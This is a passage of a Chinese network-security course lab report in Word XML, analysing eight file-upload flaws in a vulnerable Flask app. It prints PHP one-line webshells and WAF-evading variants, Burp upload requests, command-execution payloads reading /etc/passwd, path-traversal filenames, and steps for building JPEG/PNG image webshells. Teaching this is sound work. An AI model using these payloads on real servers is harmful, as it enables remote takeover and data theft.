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A1A2E"/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>文件上传漏洞分析与修复报告</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="454545"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>——基于Flask的一句话木马上传漏洞实验——</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>实验项目：Web安全漏洞分析与修复</w:t>
        <w:br/>
        <w:t>课程名称：网络安全实训</w:t>
        <w:br/>
        <w:t>报告日期：2026年7月</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>目  录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第1章  漏洞概述与风险评级</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第2章  一句话木马原理详解</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第3章  实验环境与代码结构</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第4章  8大漏洞逐项分析与复现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第5章  漏洞复现步骤（Burp Suite实操）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第6章  图片马（JPEG/PNG隐藏木马）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第7章  修复方案详解（对应8大漏洞）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第8章  修复前后代码对比</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第9章  安全编码规范总结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第一章  漏洞概述与风险评级</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>文件上传漏洞（Unrestricted File Upload）是OWASP Top 10中最为严重的高危漏洞之一。攻击者通过上传包含恶意代码的文件到服务器，可获得服务器远程控制权限，执行任意系统命令、窃取数据、横向移动。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评估项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评级/评分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CVSS 3.0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9.8（Critical）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攻击向量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网络远程攻击（AV:N）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攻击复杂度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低（AC:L）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影响范围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完全控制服务器（C:H/I:H/A:H）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>本次实验发现的8个安全漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>在本次Flask应用的文件上传功能中，共发现以下8个安全漏洞：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">    漏洞1 - 高危：</w:t>
      </w:r>
      <w:r>
        <w:t>未校验文件后缀，允许上传.php/.phtml等脚本文件，可上传一句话木马</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">    漏洞2 - 高危：</w:t>
      </w:r>
      <w:r>
        <w:t>不检测文件真实MIME/文件内容，图片马可正常上传绕过限制</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">    漏洞3 - 高危：</w:t>
      </w:r>
      <w:r>
        <w:t>直接使用用户原始文件名保存，未过滤../路径字符，存在路径穿越漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">    漏洞4 - 中危：</w:t>
      </w:r>
      <w:r>
        <w:t>无随机重命名机制，存在同名文件覆盖风险</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">    漏洞5 - 中危：</w:t>
      </w:r>
      <w:r>
        <w:t>仅前端限制文件类型，后端无校验，抓包即可绕过前端限制</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">    漏洞6 - 高危：</w:t>
      </w:r>
      <w:r>
        <w:t>上传目录未配置服务器规则，上传的恶意脚本可直接被解析执行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">    漏洞7 - 低危：</w:t>
      </w:r>
      <w:r>
        <w:t>无上传行为日志，无法溯源攻击行为</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">    漏洞8 - 高危：</w:t>
      </w:r>
      <w:r>
        <w:t>未校验最终保存路径是否限定在uploads文件夹内，存在越目录写入风险</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第二章  一句话木马原理详解</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.1 什么是一句话木马</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>一句话木马（WebShell）是一段极短的恶意代码（通常仅22字节），攻击者将其隐藏在上传的文件中。当服务器处理该文件时，木马代码被执行，攻击者通过HTTP请求参数控制服务器。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.2 经典PHP一句话木马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&lt;?php @eval($_POST["cmd"]); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.3 代码拆解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代码段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&lt;?php...?&gt;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PHP代码标记，中间代码被执行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@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错误抑制符，隐藏输出防检测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eval()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核心危险函数，参数作PHP代码执行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$_POST["cmd"]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接收HTTP POST请求中cmd参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.4 一句话木马变种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变种代码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&lt;?php @system($_REQUEST["cmd"]); ?&gt;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用system()替代eval()，直接执行系统命令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&lt;?php @assert($_POST["cmd"]); ?&gt;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用assert()绕过部分WAF检测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&lt;?php $_GET["a"]($_POST["b"]); ?&gt;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变量函数调用，?a=assert动态执行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&lt;script language="php"&gt;...&lt;/script&gt;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Script标签形式绕过&lt;?php过滤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GIF89a&lt;?php @eval($_POST["cmd"]); ?&gt;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GIF文件头+一句话木马绕过图片检查</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第三章  实验环境与代码结构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Web框架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Python Flask 3.1.3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SQLite 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操作系统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Kali Linux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攻击工具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Burp Suite / 蚁剑 / curl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Python版本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3.13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服务器地址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0"/>
              </w:rPr>
              <w:t>192.168.199.128:5000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.1 文件结构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flask-app-vuln/</w:t>
        <w:br/>
        <w:t>├── app.py              # 有漏洞版</w:t>
        <w:br/>
        <w:t>├── app_fixed.py        # 修复版</w:t>
        <w:br/>
        <w:t>├── data/users.db       # SQLite数据库</w:t>
        <w:br/>
        <w:t>├── templates/</w:t>
        <w:br/>
        <w:t>│   ├── upload.html     # 有漏洞上传页</w:t>
        <w:br/>
        <w:t>│   └── upload_fixed.html # 修复版上传页</w:t>
        <w:br/>
        <w:t>├── static/uploads/     # 上传目录（无防护）</w:t>
        <w:br/>
        <w:t>├── logs/               # 审计日志目录</w:t>
        <w:br/>
        <w:t>└── gen_*.py            # 报告生成脚本</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第四章  8大漏洞逐项分析与复现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>漏洞1：未校验文件后缀</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="D32F2F"/>
        </w:rPr>
        <w:t xml:space="preserve">[高危] </w:t>
      </w:r>
      <w:r>
        <w:t>攻击者可上传.php、.phtml、.php5、.asp、.jsp等可执行脚本文件。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>漏洞代码位置：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app.py第199-202行未做任何后缀检查，shell.php直接保存到uploads目录。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>攻击效果：</w:t>
      </w:r>
      <w:r>
        <w:t>攻击者上传shell.php后，访问http://target/static/uploads/shell.php即可执行任意PHP代码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r>
        <w:t>建立白名单，仅允许.jpg/.jpeg/.png/.gif/.bmp/.webp六种图片格式。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="C8E6C9" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>✅ 对应修复：建立白名单，仅允许.jpg/.jpeg/.png/.gif/.bmp/.webp六种图片格式。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>漏洞2：不检测文件真实MIME</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="D32F2F"/>
        </w:rPr>
        <w:t xml:space="preserve">[高危] </w:t>
      </w:r>
      <w:r>
        <w:t>攻击者可伪造文件后缀（如shell.php改名为shell.jpg），绕过仅有的前端检查。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>漏洞代码位置：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app.py未使用python-magic等库检测文件真实内容类型。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>攻击效果：</w:t>
      </w:r>
      <w:r>
        <w:t>即使限制后缀为.jpg，攻击者仍可将PHP代码嵌入JPEG图片尾部（图片马）上传。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r>
        <w:t>使用python-magic库读取文件头魔数，验证真实MIME类型是否为image/*。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="C8E6C9" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>✅ 对应修复：使用python-magic库读取文件头魔数，验证真实MIME类型是否为image/*。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>漏洞3：路径穿越</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="D32F2F"/>
        </w:rPr>
        <w:t xml:space="preserve">[高危] </w:t>
      </w:r>
      <w:r>
        <w:t>用户提供的原始文件名包含../等路径穿越字符时，可写入任意目录。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>漏洞代码位置：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app.py第201行：save_path = os.path.join(UPLOAD_DIR, filename)，filename为../../etc/shell.php可越目录写入。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>攻击效果：</w:t>
      </w:r>
      <w:r>
        <w:t>上传时文件名设为../../shell.php，文件写入到网站根目录，可直接通过HTTP访问。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r>
        <w:t>使用UUID重命名完全消除用户对文件名的控制，同时使用Path.resolve()校验最终路径。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="C8E6C9" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>✅ 对应修复：使用UUID重命名完全消除用户对文件名的控制，同时使用Path.resolve()校验最终路径。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>漏洞4：无随机重命名</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="F57C00"/>
        </w:rPr>
        <w:t xml:space="preserve">[中危] </w:t>
      </w:r>
      <w:r>
        <w:t>用户原始文件名直接作为存储文件名，同名文件直接覆盖。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>漏洞代码位置：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app.py第200行：filename = f.filename，攻击者上传同名文件可覆盖已有文件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>攻击效果：</w:t>
      </w:r>
      <w:r>
        <w:t>上传同名文件覆盖正常图片，若之前已上传合法图片将被恶意文件替换。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r>
        <w:t>uuid.uuid4().hex生成32位随机字符串作为文件名，彻底消除命名冲突。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="C8E6C9" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>✅ 对应修复：uuid.uuid4().hex生成32位随机字符串作为文件名，彻底消除命名冲突。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>漏洞5：仅前端限制</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="F57C00"/>
        </w:rPr>
        <w:t xml:space="preserve">[中危] </w:t>
      </w:r>
      <w:r>
        <w:t>HTML的accept属性和JS验证仅在浏览器端生效，抓包直接绕过。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>漏洞代码位置：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app.py后端代码无任何文件类型校验逻辑。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>攻击效果：</w:t>
      </w:r>
      <w:r>
        <w:t>使用Burp Suite拦截上传请求，修改Content-Type和文件名后转发，后端完全信任。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r>
        <w:t>后端独立执行完整的文件类型检测流程，不依赖前端任何验证。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="C8E6C9" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>✅ 对应修复：后端独立执行完整的文件类型检测流程，不依赖前端任何验证。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>漏洞6：上传目录可执行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="D32F2F"/>
        </w:rPr>
        <w:t xml:space="preserve">[高危] </w:t>
      </w:r>
      <w:r>
        <w:t>static/uploads目录未配置.htaccess或Nginx规则阻止脚本执行。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>漏洞代码位置：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缺少.htaccess规则（Apache）或location规则（Nginx）禁止PHP解析。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>攻击效果：</w:t>
      </w:r>
      <w:r>
        <w:t>上传的shell.php可直接通过HTTP访问，PHP引擎正常解析执行木马。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r>
        <w:t>在上传目录生成.htaccess文件强制禁止PHP执行，或配置Web服务器规则。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="C8E6C9" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>✅ 对应修复：在上传目录生成.htaccess文件强制禁止PHP执行，或配置Web服务器规则。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>漏洞7：无审计日志</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="F57C00"/>
        </w:rPr>
        <w:t xml:space="preserve">[低危] </w:t>
      </w:r>
      <w:r>
        <w:t>文件上传操作未记录任何日志，发生安全事件后无法追踪溯源。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>漏洞代码位置：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app.py完全没有日志记录相关代码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>攻击效果：</w:t>
      </w:r>
      <w:r>
        <w:t>攻击者上传木马后不留痕迹，无法确定攻击时间、IP、用户、文件名。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r>
        <w:t>使用logging模块记录每次上传的：用户、原始文件名、保存文件名、文件大小、MIME类型、IP地址、时间。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="C8E6C9" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>✅ 对应修复：使用logging模块记录每次上传的：用户、原始文件名、保存文件名、文件大小、MIME类型、IP地址、时间。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>漏洞8：越目录写入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="D32F2F"/>
        </w:rPr>
        <w:t xml:space="preserve">[高危] </w:t>
      </w:r>
      <w:r>
        <w:t>os.path.join(UPLOAD_DIR, filename)虽然拼接了uploads路径，但filename含../可逃逸。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>漏洞代码位置：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app.py第201-202行未验证最终保存路径是否在UPLOAD_DIR范围内。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>攻击效果：</w:t>
      </w:r>
      <w:r>
        <w:t>filename=../../app.py可覆盖服务器主文件，造成网站瘫痪或代码执行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r>
        <w:t>使用Path.resolve()规范化路径后，用startswith()校验是否在UPLOAD_DIR内。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="C8E6C9" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>✅ 对应修复：使用Path.resolve()规范化路径后，用startswith()校验是否在UPLOAD_DIR内。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第五章  漏洞复现步骤（Burp Suite实操）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.1 环境准备</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>启动有漏洞的Flask应用：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cd flask-app-vuln &amp;&amp; pip install flask &amp;&amp; python app.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Burp Suite配置浏览器代理（127.0.0.1:8080），拦截HTTP请求。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.2 创建一句话木马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echo '&lt;?php @eval($_POST["cmd"]); ?&gt;' &gt; shell.php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.3 登录系统</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>访问 http://192.168.199.128:5000/login，使用admin/admin123登录。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.4 上传木马（Burp抓包绕过）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Step1：打开Burp拦截，访问/upload页面提交shell.php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Step2：Burp抓获的请求显示Content-Type和文件名均为原始值，无校验</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Step3：转发请求，上传成功，返回文件URL：/static/uploads/shell.php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POST /upload HTTP/1.1</w:t>
        <w:br/>
        <w:t>Host: 192.168.199.128:5000</w:t>
        <w:br/>
        <w:t>Content-Type: multipart/form-data; boundary=----WebKitFormBoundary</w:t>
        <w:br/>
        <w:br/>
        <w:t>------WebKitFormBoundary</w:t>
        <w:br/>
        <w:t>Content-Disposition: form-data; name="file"; filename="shell.php"</w:t>
        <w:br/>
        <w:t>Content-Type: application/x-php</w:t>
        <w:br/>
        <w:br/>
        <w:t>&lt;?php @eval($_POST["cmd"]); ?&gt;</w:t>
        <w:br/>
        <w:t>------WebKitFormBoundary--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.5 执行系统命令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POST /static/uploads/shell.php HTTP/1.1</w:t>
        <w:br/>
        <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
        <w:br/>
        <w:br/>
        <w:t>cmd=system('id');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命令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返回示例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cmd=system('id')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uid=0(root) gid=0(root)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查看当前用户权限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cmd=system('ls -la')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-rw-r--r-- 1 root root ...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列出目录内容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cmd=system('cat /etc/passwd')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root:x:0:0:root:/root:...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读取系统账户文件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cmd=phpinfo()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PHP配置完整信息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查看PHP环境配置</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.6 路径穿越利用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>将文件命名为../../shell.php上传，可越目录写入网站根目录。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Burp中修改filename="../../shell.php"</w:t>
        <w:br/>
        <w:t># 文件实际保存到：/root/flask-app-vuln/shell.php（逃逸了uploads目录）</w:t>
        <w:br/>
        <w:t># 可直接通过 http://target:5000/shell.php 访问执行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第六章  图片马（JPEG/PNG隐藏木马）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>图片马（Image WebShell）将一句话木马隐藏在合法图片文件中，绕过基于后缀的检查。图片查看器只解析图像数据，PHP服务器则执行所有&lt;?php?&gt;代码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6.1 JPEG图片马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创建合法JPEG文件头</w:t>
        <w:br/>
        <w:t>printf '\xff\xd8\xff\xe0\x00\x10JFIF...' &gt; shell.jpg</w:t>
        <w:br/>
        <w:t># 尾部追加一句话木马</w:t>
        <w:br/>
        <w:t>echo '&lt;?php @eval($_POST["cmd"]); ?&gt;' &gt;&gt; shell.jpg</w:t>
        <w:br/>
        <w:t>$ file shell.jpg</w:t>
        <w:br/>
        <w:t>shell.jpg: JPEG image data  ✅ (合法图片)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>原理：JPEG以FF D8开头、FF D9结束。图片查看器读到FF D9停止解析，但PHP引擎继续扫描执行&lt;?php?&gt;。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[FF D8][JFIF头][图像数据][FF D9][&lt;?php @eval($_POST["cmd"]); ?&gt;]</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ↑ JPEG解析到此为止 ↑              ↑ PHP从这里执行 ↑</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6.2 PNG图片马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# 方式1：文件尾追加</w:t>
        <w:br/>
        <w:t>cat &gt; shell.png &lt;&lt; EOF</w:t>
        <w:br/>
        <w:t>...PNG二进制头...</w:t>
        <w:br/>
        <w:t>&lt;?php @eval($_POST["cmd"]); ?&gt;</w:t>
        <w:br/>
        <w:t>EOF</w:t>
        <w:br/>
        <w:br/>
        <w:t># 方式2：PNG tEXt元数据块嵌入（更隐蔽）</w:t>
        <w:br/>
        <w:t># 在IEND前插入tEXt块，keyword=Comment</w:t>
        <w:br/>
        <w:t># 内容：Comment&lt;?php @eval($_POST["cmd"]); ?&gt;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[89 50 4E 47][IHDR][IDAT][IEND][&lt;?php @eval($_POST["cmd"]); ?&gt;]</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ↑ PNG解析到此 ↑              ↑ PHP执行 ↑</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第七章  修复方案详解（对应8大漏洞）</w:t>
      </w:r>
